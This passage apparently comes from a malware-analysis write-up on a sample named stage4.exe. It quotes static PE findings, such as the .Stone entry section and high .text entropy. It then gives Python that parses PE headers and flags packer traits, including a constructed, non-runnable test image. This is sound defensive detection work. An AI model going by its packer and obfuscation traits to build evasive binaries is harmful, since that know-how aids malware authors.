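    for hit in scan_push_ret(SAMPLE_CODE, base=0x01215E2F, max_gap=2):
        print(f"{hit['push']:08X} {hit['text']} (ret at {hit['ret']:08X}, gap {hit['gap']})")
```

With max_gap=0 the decoy at offset 20 is still reported, so a hit from a byte scan should be confirmed in a disassembler before it is counted as obfuscation; the value of the scan is in narrowing down where to look.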
Source: stage4.exe | Static PE information: section name: .Stone
Source: initial sample | Static PE information: section where entry point is pointing to: .Stone
Source: initial sample | Static PE information: section name: .text entropy: 7.32674754274
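The static traits reported for stage4.exe (no import directory, a writeable and executable .text section, the entry point in a section named .Stone, .text entropy above 7 bits per byte, and the TERMINAL_SERVER_AWARE, DYNAMIC_BASE and NX_COMPAT DllCharacteristics) can all be read straight from the PE headers. The following standard-library Python is an added example written for this page, not part of the report or of Joe Sandbox: parse_pe() walks the DOS, file, optional and section headers, and static_findings() applies the checks. build_sample_pe() constructs a small, non-runnable PE32 image with the same traits purely as test input; it is not stage4.exe. STANDARD_SECTIONS and the 7.0-bit entropy threshold are the example's own assumptions.

```python
import math
import random
import struct
from collections import Counter

IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE = 0x00000020, 0x20000000
IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE = 0x40000000, 0x80000000
DLL_FLAGS = {0x0040: "DYNAMIC_BASE", 0x0100: "NX_COMPAT", 0x8000: "TERMINAL_SERVER_AWARE"}
# Section names a linker normally emits (assumed list); anything else is worth a look.
STANDARD_SECTIONS = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata", ".edata", ".pdata", ".tls", ".bss"}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 8.0 is uniform random, compiled x86 code usually sits around 5 to 6.5."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_pe(buf: bytes):
    """Minimal PE32 / PE32+ header walk: entry point RVA, import directory size,
    DllCharacteristics and the section table. Raises ValueError on a non-PE buffer."""
    if buf[:2] != b"MZ":
        raise ValueError("no MZ header")
    pe = struct.unpack_from("<I", buf, 0x3C)[0]                 # e_lfanew
    if buf[pe:pe + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    nsect = struct.unpack_from("<H", buf, pe + 6)[0]            # IMAGE_FILE_HEADER.NumberOfSections
    opt_size = struct.unpack_from("<H", buf, pe + 20)[0]        # IMAGE_FILE_HEADER.SizeOfOptionalHeader
    opt = pe + 24                                               # IMAGE_OPTIONAL_HEADER
    magic = struct.unpack_from("<H", buf, opt)[0]
    datadir = {0x10B: opt + 96, 0x20B: opt + 112}.get(magic)    # data directories: PE32 / PE32+
    if datadir is None:
        raise ValueError("unknown optional header magic")
    entry_rva = struct.unpack_from("<I", buf, opt + 16)[0]
    dllchar = struct.unpack_from("<H", buf, opt + 70)[0]
    import_size = struct.unpack_from("<II", buf, datadir + 8)[1]   # directory 1 = import table
    sections = []
    for k in range(nsect):
        off = opt + opt_size + 40 * k
        vsize, vaddr, rawsize, rawptr = struct.unpack_from("<IIII", buf, off + 8)
        sections.append({"name": buf[off:off + 8].rstrip(b"\0").decode("ascii", "replace"),
                         "vaddr": vaddr, "vsize": vsize or rawsize,
                         "chars": struct.unpack_from("<I", buf, off + 36)[0],
                         "data": buf[rawptr:rawptr + rawsize]})
    return {"entry_rva": entry_rva, "import_size": import_size, "dllchar": dllchar, "sections": sections}


def static_findings(buf: bytes, entropy_limit: float = 7.0):
    """The report's static checks, as a list of finding strings."""
    p = parse_pe(buf)
    out = []
    if p["import_size"] == 0:
        out.append("no import directory: APIs are resolved at run time")
    ep = next((s for s in p["sections"] if s["vaddr"] <= p["entry_rva"] < s["vaddr"] + s["vsize"]), None)
    if ep is None:
        out.append("entry point outside every section")
    elif ep["name"] not in STANDARD_SECTIONS:
        out.append(f"entry point in non-standard section {ep['name']}")
    for s in p["sections"]:
        if s["name"] not in STANDARD_SECTIONS:
            out.append(f"non-standard section name {s['name']}")
        if s["chars"] & IMAGE_SCN_MEM_WRITE and s["chars"] & IMAGE_SCN_MEM_EXECUTE:
            out.append(f"writeable and executable section {s['name']}")
        h = shannon_entropy(s["data"])
        if h > entropy_limit:
            out.append(f"high entropy in {s['name']} ({h:.2f} bits/byte): packed or encrypted content")
    out.append("DllCharacteristics: " + ", ".join(n for f, n in DLL_FLAGS.items() if p["dllchar"] & f))
    return out


def build_sample_pe() -> bytes:
    """Constructed test image, not stage4.exe and not runnable: no imports, a W+X .text
    filled with seeded random bytes, and the entry point in a section named .Stone."""
    rng = random.Random(1)
    text = bytes(rng.randrange(256) for _ in range(0x400))
    stone = b"\xCC" * 0x200
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)            # e_lfanew = 0x40
    file_hdr = struct.pack("<HHIIIHH", 0x014C, 2, 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                           # PE32
    struct.pack_into("<I", opt, 16, 0x2000)                         # AddressOfEntryPoint -> .Stone
    struct.pack_into("<I", opt, 28, 0x00400000)                     # ImageBase
    struct.pack_into("<II", opt, 32, 0x1000, 0x200)                 # SectionAlignment, FileAlignment
    struct.pack_into("<II", opt, 56, 0x3000, 0x200)                 # SizeOfImage, SizeOfHeaders
    struct.pack_into("<HH", opt, 68, 2, 0x8140)                     # Subsystem GUI, DllCharacteristics
    struct.pack_into("<I", opt, 92, 16)                             # NumberOfRvaAndSizes; all directories zero

    def section(name, vaddr, data, rawptr, chars):
        return struct.pack("<8sIIIIIIHHI", name, len(data), vaddr, len(data), rawptr, 0, 0, 0, 0, chars)

    hdr = (dos + b"PE\0\0" + file_hdr + bytes(opt)
           + section(b".text", 0x1000, text, 0x200,
                     IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE)
           + section(b".Stone", 0x2000, stone, 0x600, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ))
    return hdr.ljust(0x200, b"\0") + text + stone


if __name__ == "__main__":
    for finding in static_findings(build_sample_pe()):
        print(finding)
```

A writeable code section is the trait to weigh most: a packer that decrypts .text in place needs it, and nothing a normal compiler emits does, so it is a cheap first filter before the heavier dynamic analysis above.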